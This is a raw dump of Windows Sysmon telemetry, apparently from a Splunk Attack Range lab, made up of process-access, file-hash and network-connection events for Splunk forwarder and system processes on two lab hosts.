07:53:18.129{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4EE-60EB-427D-00000000CF01}9832C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049242Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.095{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F4EE-60EB-427D-00000000CF01}9832C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049241Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.095{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4EE-60EB-427D-00000000CF01}9832C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049240Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.052{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049239Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.052{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049238Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.032{466BC892-02B0-60E8-1600-00000000CF01}13048524C:\Windows\System32\svchost.exe{466BC892-F4ED-60EB-417D-00000000CF01}10008C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049237Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.032{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F4ED-60EB-417D-00000000CF01}10008C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049236Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.032{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4ED-60EB-417D-00000000CF01}10008C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049235Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.010{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F4ED-60EB-417D-00000000CF01}10008C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049234Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.010{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F4ED-60EB-417D-00000000CF01}10008C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049233Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.010{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4ED-60EB-417D-00000000CF01}10008C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049279Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:19.633{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E071AA05509E5347D89795D7D7FE6EBE,SHA256=2C30E7DA3F105839F114A4FCB8F2FC64B78601D5F6E9239175736DFF053E6B43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807713Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:19.209{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4734AF5001D3047EF9CD8885953BD54E,SHA256=3642F5B65E248E4802704BD16D8C6348A82C36A94DFDEE1DC7861CD1D9371CA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049278Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:19.051{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=6AED793FDBDBE09A70298BD1009B0027,SHA256=0D89947F51C053AD44657DCA96066C3183F216A0463CCD0E0F766E37999B024A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049277Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:19.051{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=8BBF74879B65BCAC5B187C4A1D334556,SHA256=5A3B20D773FEA61084D9FEDC858FD20D1CDB3D9523E54845335A1266220DBAE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049283Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:20.650{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55B3D941B76AC9128D784D5D0E964A25,SHA256=020FE1EDA03E15E7B942EB09C2DF566EB2465A800E54BD74CD78B2603AF730F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807716Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:20.506{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807715Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:19.248{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57278-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807714Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:20.225{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F83E08D872AD99FD65119ADB0D775A8,SHA256=9791407B60F487506CEA8EFDFCFD88EE3C1E6B696208FC0E5F80B4A642499A58,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049282Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:12.672{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51039-false10.0.1.12-8000- 354300x80000000000000001049281Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:12.136{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-62256-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001049280Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:20.265{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4F2766E7F4B32FF97C48A8BC2487B983,SHA256=5B332C3A8FB4010BE342C4DB5BC66A8C7EB0D0A2541B43BEF48F3D54E22F2C02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049285Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:21.665{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD425020F37CD12EC46CC5C331DC2DEA,SHA256=E649ADEAF15B569F568D0BCEEE7F2590AC2A883715B21617F664234C00EA1370,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807717Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:21.225{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=734DF1FC7FB7BB8A8D113F09FB090E2F,SHA256=56509F043641667A347730044A08A8428EB1D995A63ED5561A175D7984C445CE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049284Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:21.250{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-6E0B-00000000CF01}6608C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049286Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:22.680{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9BA11EB4A1290E47149E5D49D684C18,SHA256=6F5130746BA884CF282D2890303B8357765B8F986EF26AE8741FF23A5B1A0E41,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807719Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:20.639{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57279-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000807718Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:22.240{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56E3CC49790DB0081A55FC003974F14B,SHA256=1467D94C1E8346A9A00031AF45307AD9B13813E1A9F03FB96CED48A2B6744734,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049290Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:23.695{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEACA30DCF7A1F133D116A31DC473FC1,SHA256=81EDC9F80677940410B222DD98E6410C6DFB91D928AF89D51219348CF447E0D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807720Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:23.240{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F81D1CDAFC79C97664884F7998A91493,SHA256=CC53A11693A5B48A0BF8124D17FD751673A82E9ADA2B69E78BF3D15337076C1D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049289Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:23.530{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+8a26e|C:\Windows\System32\ole32.dll+89b6b|C:\Windows\System32\ole32.dll+88d27|C:\Windows\System32\ole32.dll+8c957|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9 10341000x80000000000000001049288Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:23.529{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+b5f62|C:\Windows\System32\ole32.dll+89b39|C:\Windows\System32\ole32.dll+88d27|C:\Windows\System32\ole32.dll+8c957|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9 10341000x80000000000000001049287Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:23.249{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+8a360|C:\Windows\System32\ole32.dll+8c46e|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+5888a 23542300x80000000000000001049291Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:24.710{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE288ACF401549AC3EEEDE3C4B561034,SHA256=F5B628FCEC7874A080FE3CDED3B38A59D4950A272A008D59729C3E04EE665D0C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807747Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.975{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4F4-60EB-7B79-00000000D001}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807746Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.975{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807745Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 